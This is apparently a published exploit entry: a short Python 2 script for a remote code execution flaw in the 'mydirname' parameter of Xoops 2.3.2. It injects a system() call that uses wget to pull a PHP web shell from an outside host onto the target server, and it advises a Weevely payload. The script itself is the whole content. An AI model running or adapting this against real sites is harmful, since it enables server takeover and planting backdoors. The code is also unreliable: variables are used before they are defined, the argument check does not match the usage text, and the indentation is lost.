Xoops version 2.3.2 suffers from a remote code execution vulnerability in the mydirname parameter.
ea1f08a5a265d8abd6a9171f572dfdaf10a138346ebc32742bbe81fdb47d184e
#!/usr/bin/env python
# Title: Xoops 2.3.2 "mydirname" Remote Code Execution Exploit
# CVE: ????-????
# Reference: http://secunia.com/advisories/33435/
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests
import sys
vulnurl = "/xoops_lib/modules/protector/onupdate.php?" # Oh look, the vuln URL!
xpl = "mydirname=a(){}system(%27"+cmd+"%27);%20function%20v"
cmd = "wget%20"+payloadurl+"%20-O%20shell.php"
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
def banner():
print """
Xoops "mydirname" remote code execution exploit. Basically PHP Eval() bug :)
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
"""
if len(sys.argv) != 4:
banner()
print "Usage: ./x2.py <target>"
print "Where <target> is the vulnerable website."
print "Example: ./x2.py http://lamesite.com"
sys.exit(1)
banner()
target = sys.argv[1]
pwnme = target + vulnurl + xpl
print "[+] Running Exploit..."
requests.get(pwnme)
print "[?] Gotshell?"
print "[+] Shell should be at "+target+"/xoops_lib/modules/protector/shell.php"